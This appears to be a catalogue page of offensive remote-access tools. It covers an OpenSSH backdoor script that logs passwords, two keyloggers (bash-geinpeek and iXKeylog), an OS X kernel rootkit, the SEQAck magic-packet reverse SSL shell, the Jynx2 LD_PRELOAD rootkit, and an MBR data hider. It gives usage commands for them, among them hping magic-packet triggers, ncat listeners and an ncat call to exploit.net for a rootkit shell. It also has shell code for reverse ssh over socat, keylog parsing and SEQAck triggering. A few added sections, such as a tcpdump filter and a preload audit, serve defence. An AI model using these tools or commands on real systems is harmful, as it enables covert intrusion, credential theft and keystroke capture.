Remote Administration Tool

Backdoor: a tool that allows you to remotely access and control a computer or device.

SSH Back

SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl.

              __     ______              __
.-----.-----.|  |--.|   __ \.---.-.----.|  |--.
|__ --|__ --||     ||   __ <|  _  |  __||    <
|_____|_____||__|__||______/|___._|____||__|__|
Copyright (C) 2014

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Have you ever needed to have access to an ssh server from behind
a NAT'ed firewall? Now you can. SSHBack allows you to have reverse
ssh connections connect back to you.

Made from 100% FOSS recycled materials, this software is made to
withstand the most demanding conditions, including, but not
limited to: __FILL_IN_BLANK_HERE__

(For amusement purposes only. Do not abuse or misuse this product.
Do not ruin anyone's day with this software, please!)

sshback client machine: has openssh-server installed (the NAT'ed host you want to reach)
sshback server machine: has openssh-client installed (the host the client calls back to)

NOTE: "Server_Common_Name" must be able to DNS resolve
      on the client machine, e.g.
$ host www.servercommonname.com
www.servercommonname.com has address xxx.xxx.xxx.xxx

run
$ ./sshback_make_certs.sh
to make all the certs

then move client.pem, server.crt, and sshback_client.sh to the
  machine with openssh-server installed
make sure 'socat' is installed
chmod +x sshback_client.sh
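The procedure above, as an added example that is not SSH Back's own scripts: a private CA with one server and one client certificate (what sshback_make_certs.sh produces, here done directly with openssl), and the two socat command lines that carry the reverse ssh session over mutually authenticated TLS. Host names, ports, file names and the certificate CNs are assumptions; openssl is assumed on the machine making the certs and socat on both ends.

```shell
#!/bin/sh
# Added example, not part of SSH Back: certificate set plus the socat pair for a
# reverse ssh connection over TLS with client certificate verification.
set -eu

# Make a private CA, a server cert whose CN is Server_Common_Name, and a client cert.
# socat takes its own identity from cert=<key+cert PEM> and checks the peer against
# cafile=<CA cert>; with verify=1 a peer not signed by that CA is dropped.
sshback_make_certs() { # $1 = output directory, $2 = Server_Common_Name (must resolve on the client)
  dir="$1"; server_cn="$2"
  mkdir -p "$dir"
  openssl req -x509 -newkey rsa:2048 -nodes -days 365 -subj "/CN=sshback-ca" \
    -keyout "$dir/ca.key" -out "$dir/ca.crt" 2>/dev/null
  for role in server client; do
    if [ "$role" = server ]; then cn="$server_cn"; else cn="sshback-client"; fi
    openssl req -newkey rsa:2048 -nodes -subj "/CN=$cn" \
      -keyout "$dir/$role.key" -out "$dir/$role.csr" 2>/dev/null
    openssl x509 -req -days 365 -in "$dir/$role.csr" -CA "$dir/ca.crt" \
      -CAkey "$dir/ca.key" -CAcreateserial -out "$dir/$role.crt" 2>/dev/null
    # socat's cert= option wants key and certificate in one PEM file
    cat "$dir/$role.key" "$dir/$role.crt" > "$dir/$role.pem"
    chmod 600 "$dir/$role.key" "$dir/$role.pem"
  done
}

# What the peer's verify=1 will do: check that a certificate chains to the CA.
sshback_verify_cert() { # $1 = directory, $2 = server | client
  openssl verify -CAfile "$1/ca.crt" "$1/$2.crt" >/dev/null 2>&1
}

# Run on the sshback server (your machine, openssh-client installed): wait for the
# TLS call-back, then bridge it to a loopback port that your own ssh client connects to.
sshback_catcher_cmd() { # $1 = public TLS port, $2 = loopback port for ssh
  printf 'socat OPENSSL-LISTEN:%s,reuseaddr,cert=server.pem,cafile=ca.crt,verify=1 TCP-LISTEN:%s,bind=127.0.0.1,reuseaddr\n' "$1" "$2"
}

# Run on the sshback client (NAT'ed host, openssh-server installed): dial out over TLS
# and splice the stream into the local sshd. commonname= (recent socat) additionally
# pins the peer certificate to Server_Common_Name, so a stolen CA-signed server cert
# with another CN is refused.
sshback_client_cmd() { # $1 = Server_Common_Name, $2 = public TLS port
  printf 'socat OPENSSL:%s:%s,cert=client.pem,cafile=ca.crt,verify=1,commonname=%s TCP:127.0.0.1:22\n' "$1" "$2" "$1"
}
```

Usage: `sshback_make_certs certs www.servercommonname.com`, copy client.pem and ca.crt to the NAT'ed host, start the catcher command on your machine, the client command on the NAT'ed host, then `ssh -p 2222 user@127.0.0.1` on your machine. Each socat invocation carries one session; wrap the client side in a loop if you want it to reconnect. Note that the sshd host keys are still what protects the inner ssh session; the TLS layer only hides the protocol and keeps strangers from reaching the sshd through your listener.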

bash-geinpeek

A keylogger consisting of a set of patches for bash plus a helper command: it captures everything logged-in users type and writes it to FIFOs, so the keystrokes can be monitored in real time.

1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff

7. patch < [patch file name you wanna add]

patch kit list

- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )

the forces with you man ~

NEW FEATURE:

[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami

[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear

Command lines marked !s! above were executed from inside a shell script rather than typed at the prompt;
the -i flag of ghelper suppresses them so only interactive input is shown.
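The monitor format above, as an added example that is not part of bash-geinpeek: a POSIX sh/awk parser for ghelper's output lines, with the -i behaviour (drop the !s! scripted commands) implemented as a filter. The sample lines are copied from the page's output and serve as a constructed fixture; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of bash-geinpeek: parse ghelper monitor lines and
# separate interactive input from commands that ran inside a script.
set -eu

# Fixture: the lines shown on the page, not a live capture.
geinpeek_sample() {
  cat <<'EOF'
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
EOF
}

# stdin: monitor lines. stdout: TSV of scripted(0/1), timestamp, user, tty, cwd, command.
geinpeek_parse() {
  awk '
  {
    scripted = 0; line = $0
    if (substr(line, 1, 4) == "!s! ") { scripted = 1; line = substr(line, 5) }
    # layout: "<timestamp> - [<user>@<tty> <cwd>]$ <command>"
    if (!match(line, / - \[[^@]+@[^ ]+ [^]]*\]\$ /)) next
    ts  = substr(line, 1, RSTART - 1)
    hdr = substr(line, RSTART + 4, RLENGTH - 7)      # strip " - [" and "]$ "
    cmd = substr(line, RSTART + RLENGTH)
    at = index(hdr, "@"); sp = index(hdr, " ")
    user = substr(hdr, 1, at - 1)
    tty  = substr(hdr, at + 1, sp - at - 1)
    cwd  = substr(hdr, sp + 1)
    printf "%d\t%s\t%s\t%s\t%s\t%s\n", scripted, ts, user, tty, cwd, cmd
  }'
}

# Equivalent of "ghelper <file> -i": interactive input only.
geinpeek_interactive() { geinpeek_parse | awk -F '\t' '$1 == 0'; }

# The other half: commands that ran from a script, useful to set aside when reviewing
# what a person actually typed on the tty.
geinpeek_scripted() { geinpeek_parse | awk -F '\t' '$1 == 1'; }
```

Run as `geinpeek_sample | geinpeek_interactive`; with a real capture, read the FIFO or the saved file instead of `geinpeek_sample`. Because the !s! marker is the only thing distinguishing the two kinds of lines, anything that strips leading tokens from the log before parsing makes scripted and interactive commands indistinguishable.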

satyr's openssh autobackdooring doohicky

This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.

# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
#  [email protected]
# ============================================
# USAGE:
#      Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
#      If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
#      (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
#      [it'll install them via apt or yum, whichever is available]).
#      Note: This script will delete itself once it's fairly sure the openssh compile went smoothly.
#      It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd.
# ============================================
# WTF:
#      I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are
#      just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies
#      such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different
#      versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't
#      originally being used on the box, which is just lazy & dumb).
#      So I wrote up this to make the whole process a bit easier (For use in my own private network of course o.O)
# ============================================

MBR Data Hider, MBR Store

This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as USB drives, hard disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons; Windows bootloader code will be shamelessly overwritten.

iXKeylog

Description:
iXKeylog is an X11 keylogger for Unix that uses Xlib to interact with the user's keyboard. iXKeylog listens for certain X11 events and then triggers specific routines to handle these events.

MD5:
39e280cd02a3f01dffa1c6cae8e5b17e

Author:
Cyneox

rubilyn

/*
                        .o8        o8o  oooo
                       "888        `"'  `888
  oooo d8b oooo  oooo   888oooo.  oooo   888  oooo    ooo ooo. .oo.
  `888""8P `888  `888   d88' `88b `888   888   `88.  .8'  `888P"Y88b
   888      888   888   888   888  888   888    `88..8'    888   888
   888      888   888   888   888  888   888     `888'     888   888
  d888b     `V88V"V8P'  `Y8bod8P' o888o o888o     .8'     o888o o888o
                                            .o..P' HARDCORE EST. 1983
                                            `Y8P'

  64bit Mac OS-X kernel rootkit that uses no hardcoded address
  to hook the BSD subsystem in all OS-X Lion & below. It uses a
  combination of syscall hooking and DKOM to hide activity on a
  host. String resolution of symbols no longer works on Mountain
  Lion as symtab is destroyed during load, this code is portable
  on all Lion & below but requires re-working for hooking under
  Mountain Lion.

  Features:
  * works across multiple kernel versions (tested 11.0.0+)
  * give root privileges to pid
  * hide files / folders
  * hide a process
  * hide a user from 'who'/'w'
  * hide a network port from netstat
  * sysctl interface for userland control
  * execute a binary with root privileges via magic ICMP ping

  greetingz to #nullsecurity crew, snare, dino, nemo, thegrugq,
  piotr & friendz!

  -- prdelka
*/

mbr_store

This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as USB drives, hard disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons; Windows bootloader code will be shamelessly overwritten.

INSTALLATION
make
sudo make install
make clean

FIRST STEPS
Get yourself a copy of your own MBR with
dd if=/dev/sdx of=my_mbr.img count=1
or use one of the provided samples in doc/.
Read, store and check your results with your favorite hex editor (e.g. ghex2).
Be careful not to damage your bootloader!
Run fdisk -l or dmesg to determine the correct device.
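The store/read cycle above, as an added example that is not mbr_store's own code: write a payload of at most 426 bytes into the bootstrap-code area of a 512-byte MBR image while leaving the partition table (bytes 446..509) and the 0x55AA signature untouched, and refuse to write over a sector that looks like GRUB. The GRUB test (looking for the literal text "GRUB" in the sector, which grub's boot.img carries) is this example's own heuristic, not a description of how the tool detects GRUB; the fixture image is constructed here.

```shell
#!/bin/sh
# Added example, not part of mbr_store: hide data in the MBR bootstrap area of an image
# file, keeping the partition table and boot signature intact.
set -eu
MBR_CODE_BYTES=426   # same cap as the tool; bytes 446..511 are partition table + signature

# Heuristic GRUB check: grub's boot.img contains the text "GRUB" inside the sector.
mbr_is_grub() { # $1 = image
  dd if="$1" bs=512 count=1 2>/dev/null | tr -c '[:print:]' '.' | grep -q 'GRUB'
}

# Last two bytes of the sector must be 55 AA for BIOS to consider it bootable.
mbr_has_signature() { # $1 = image
  [ "$(dd if="$1" bs=1 skip=510 count=2 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "55aa" ]
}

# Store a payload file at offset 0; conv=notrunc overwrites in place so nothing past the
# payload (partition table, signature) is touched.
mbr_store() { # $1 = image, $2 = payload file
  size=$(wc -c < "$2" | tr -d ' ')
  [ "$size" -le "$MBR_CODE_BYTES" ] || { echo "payload too large: $size > $MBR_CODE_BYTES" >&2; return 1; }
  if mbr_is_grub "$1"; then echo "refusing: GRUB bootloader detected in $1" >&2; return 1; fi
  dd if="$2" of="$1" bs=1 count="$size" conv=notrunc 2>/dev/null
}

# Read the hidden bytes back.
mbr_read() { # $1 = image, $2 = length
  dd if="$1" bs=1 count="$2" 2>/dev/null
}

# Constructed fixture: zeroed sector, one fake partition entry at 446, signature at 510.
mbr_make_blank() { # $1 = image
  dd if=/dev/zero of="$1" bs=512 count=1 2>/dev/null
  printf '\200\001\001\000\203\376\377\377' | dd of="$1" bs=1 seek=446 conv=notrunc 2>/dev/null
  printf '\125\252' | dd of="$1" bs=1 seek=510 conv=notrunc 2>/dev/null
}
```

On a real device, take the copy first (`dd if=/dev/sdx of=my_mbr.img count=1`), run the functions against the image, compare the partition table bytes in a hex editor, and only then write the image back. The size check and the GRUB refusal are what keep a slip from turning a data-hiding exercise into an unbootable disk.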

AUTHOR
atzeton
nullsecurity.net

LICENSE
GNU GPLv2+

SEQ/ACK Reverse Connect SSL Shell

SEQAck is an SSL-encrypted, magic-packet-triggered reverse connect backdoor application. I wrote this as part of the original Jynx-Kit LD_PRELOAD rootkit, as released from the Blackhat Library. With the second release of the rootkit we moved away from the stand-alone reverse connection backdoor and decided to hook the accept() system call instead. That was not only another example of building a backdoor; it also fit what we were doing, making things more modular.

This backdoor silently sniffs the given interface for all incoming TCP packets. It relies on two compile-time values, MAGIC_SEQ and MAGIC_ACK, which are easy to set in a crafted TCP header. Once the magic packet is received, it initiates an SSL-encrypted reverse connecting shell to the host that sent the packet, on that packet's source port. For example, we can initiate the reverse connect with the following hping command.

# hping -M 0xdead -L 0xbeef google.com -s 5000 -c 1

Notice that the source port is 5000, SEQ (-M) is 0xdead and ACK (-L) is 0xbeef. With this example we'd also need the following ncat (the netcat supplied with nmap) listener running in the background to accept the incoming connection.

# nc -l -p 5000 --ssl

And there you have it: the reverse connect shell was successful, and you're in complete control. The idea of using SEQ/ACK values could be applied to a single-packet port knock sequence as well, so this application could easily be tweaked or expanded upon based on your requirements.
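The trigger described above, as an added example that is not SEQAck's own code: the operator-side command pair (crafted packet plus TLS listener on the same source port), a decoder that does what the sniffer does with the SEQ and ACK fields of a raw TCP header, and the tcpdump/BPF expression a defender would use to see the magic packet on the wire. The magic values, target address and port are taken from the page's hping example; the header bytes are constructed.

```shell
#!/bin/sh
# Added example, not part of SEQAck: trigger, decoder and detection filter for a
# SEQ/ACK magic-packet backdoor.
set -eu
MAGIC_SEQ=0xdead
MAGIC_ACK=0xbeef

# Operator side, as on the page: one packet carrying the magic values (hping -M sets the
# sequence number, -L the acknowledgement number, -s the source port the shell will
# call back to), plus the TLS listener on that port.
seqack_trigger_cmds() { # $1 = target host, $2 = callback port
  printf 'hping3 -M %s -L %s -s %s -c 1 %s\n' "$MAGIC_SEQ" "$MAGIC_ACK" "$2" "$1"
  printf 'ncat -l -p %s --ssl\n' "$2"
}

# What the sniffer checks: bytes 4..7 of the TCP header are the sequence number,
# bytes 8..11 the acknowledgement number. Input is the header as a hex string; on a
# match the source port (bytes 0..1) is printed, since that is where the shell connects.
seqack_match() { # $1 = TCP header hex (>= 24 hex digits), $2 = magic seq, $3 = magic ack
  hex="$1"
  sport=$(( 0x$(printf '%s' "$hex" | cut -c1-4) ))
  seq=$(( 0x$(printf '%s' "$hex" | cut -c9-16) ))
  ack=$(( 0x$(printf '%s' "$hex" | cut -c17-24) ))
  [ "$seq" -eq "$(( $2 ))" ] && [ "$ack" -eq "$(( $3 ))" ] || return 1
  echo "$sport"
}

# Defender side: the same two fields as a tcpdump filter. Any TCP segment whose raw
# sequence and ack numbers equal the magic constants is a trigger (or a 2^-64 accident).
seqack_bpf() { # $1 = magic seq, $2 = magic ack
  printf 'tcp[4:4] = %s and tcp[8:4] = %s' "$1" "$2"
}

# Constructed sample header: sport 5000 (0x1388), dport 80, seq 0xdead, ack 0xbeef,
# data offset 5 with SYN set, window 512, zero checksum and urgent pointer.
SAMPLE_HDR='138800500000dead0000beef5002020000000000'
```

Usage: `seqack_trigger_cmds 192.0.2.10 5000` prints the two commands to run on the operator box, and `tcpdump -ni eth0 "$(seqack_bpf 0xdead 0xbeef)"` on a sensor shows the trigger arriving. Because the backdoor sniffs rather than listens, the magic packet needs no open port and no handshake; the only network-visible side effect is the outbound TLS connection to the packet's source port, which is what an egress rule or a NetFlow baseline should catch.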

Jynx Rootkit/2.0

Jynx2 is an expansion of the original Jynx LD_PRELOAD rootkit, written in C, with several modifications: multi-factor authentication, a more compatible shell drop, and additional hiding features.

Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable

Protip: It is possible to make Jynx2 even more difficult to remove by hooking libc's link() function as well; therefore we recommend that any LD_PRELOAD rootkit be removed from a LiveCD, where the hooked libc is not in use.

Usage:
Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like:

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..

Protip: Make sure to use the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, and the connection's file descriptor is passed through to the backdoored service instead.
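The LiveCD advice above, as an added example that is not part of Jynx2: a defender-side audit of an offline root filesystem for LD_PRELOAD persistence. It reads the suspect root's /etc/ld.so.preload and reports every listed shared object with its presence and hash, which is the check that cannot be trusted from inside the running system because the preloaded library is the one answering the file and process queries. The mount point, the sample tree and the library names are constructed for illustration and name nothing Jynx2 actually uses.

```shell
#!/bin/sh
# Added example, not part of Jynx2: audit <root>/etc/ld.so.preload on a mounted,
# not-running root filesystem (e.g. /mnt/victim from a LiveCD).
set -eu

sha256_of() { # portable sha256 of a file
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi | cut -d' ' -f1
}

# One shared object path per line. The loader accepts whitespace- or colon-separated
# entries and ignores blank lines, so normalise the same way.
preload_entries() { # $1 = root mount point
  f="$1/etc/ld.so.preload"
  [ -f "$f" ] || return 0
  tr ':' '\n' < "$f" | tr -s ' \t' '\n' | grep -v '^$' || true
}

# TSV report: path, present|missing, sha256. A dangling entry is itself worth a look;
# a present entry that the package manager does not own is the usual finding
# (follow up with: dpkg --root=<root> -S <path>  or  rpm --root <root> -qf <path>).
preload_audit() { # $1 = root mount point
  preload_entries "$1" | while IFS= read -r so; do
    if [ -f "$1$so" ]; then
      printf '%s\tpresent\t%s\n' "$so" "$(sha256_of "$1$so")"
    else
      printf '%s\tmissing\t-\n' "$so"
    fi
  done
}

# Constructed fixture: a fake root with two preload entries, one of which exists.
preload_sample_root() { # $1 = directory to build the fake root in
  mkdir -p "$1/etc" "$1/lib"
  printf '/lib/libexample.so\n/usr/local/lib/libmissing.so\n' > "$1/etc/ld.so.preload"
  printf 'placeholder, not a real ELF object' > "$1/lib/libexample.so"
}
```

From a LiveCD: mount the victim's root read-only, run `preload_audit /mnt/victim`, and compare the hashes against the distribution's packages. An empty report from inside the live system proves nothing, which is the point of the Protip; the same command on the offline mount does.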

Smbclient

An ftp-like client for accessing SMB/CIFS resources on servers. This tool is part of the Samba suite on Linux.
